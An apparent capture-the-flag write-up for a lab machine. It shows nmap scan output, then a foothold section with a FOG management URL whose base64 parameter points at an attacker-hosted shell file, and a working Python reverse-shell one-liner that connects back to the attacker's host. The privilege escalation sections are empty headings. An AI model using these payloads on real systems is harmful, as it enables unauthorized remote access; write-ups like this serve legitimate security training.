NMAP

21/tcp    open  ftp       syn-ack ttl 63 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
111/tcp open rpcbind syn-ack ttl 63 2-4 (RPC #100000)
443/tcp open ssl/https syn-ack ttl 63 Apache/2.4.29 (Ubuntu)
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2049/tcp open nfs_acl syn-ack ttl 63 3 (RPC #100227)
3306/tcp open mysql syn-ack ttl 63 MySQL 5.5.5-10.1.48-MariaDB-0ubuntu0.18.04.1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.1.48-MariaDB-0ubuntu0.18.04.1
| Thread ID: 89
| Capabilities flags: 63487
| Some Capabilities: InteractiveClient, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, Support41Auth, Speaks41ProtocolOld, SupportsTransaction
s, LongPassword, SupportsLoadDataLocal, IgnoreSigpipes, ODBCClient, DontAllowDatabaseTableColumn, FoundRows, SupportsCompression, Speaks41ProtocolNe
w, LongColumnFlag, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: ;sV4=wbeUX:W*gL$m{Bs
|_ Auth Plugin Name: mysql_native_password
42493/tcp open nlockmgr syn-ack ttl 63 1-4 (RPC #100021)
57597/tcp open mountd syn-ack ttl 63 1-3 (RPC #100005)
58527/tcp open mountd syn-ack ttl 63 1-3 (RPC #100005)
60677/tcp open mountd syn-ack ttl 63 1-3 (RPC #100005)

PORT 2049 (NFS)

Foothold

http://10.10.39.253:443/fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzAuOC45NC42MC9teXNoZWxsCg==&arch=arm64
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.94.60",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Rabbit hole

Privilege Escalation (1st method)

Privilege Escalation (2nd method)

References

Pentester | CTF Player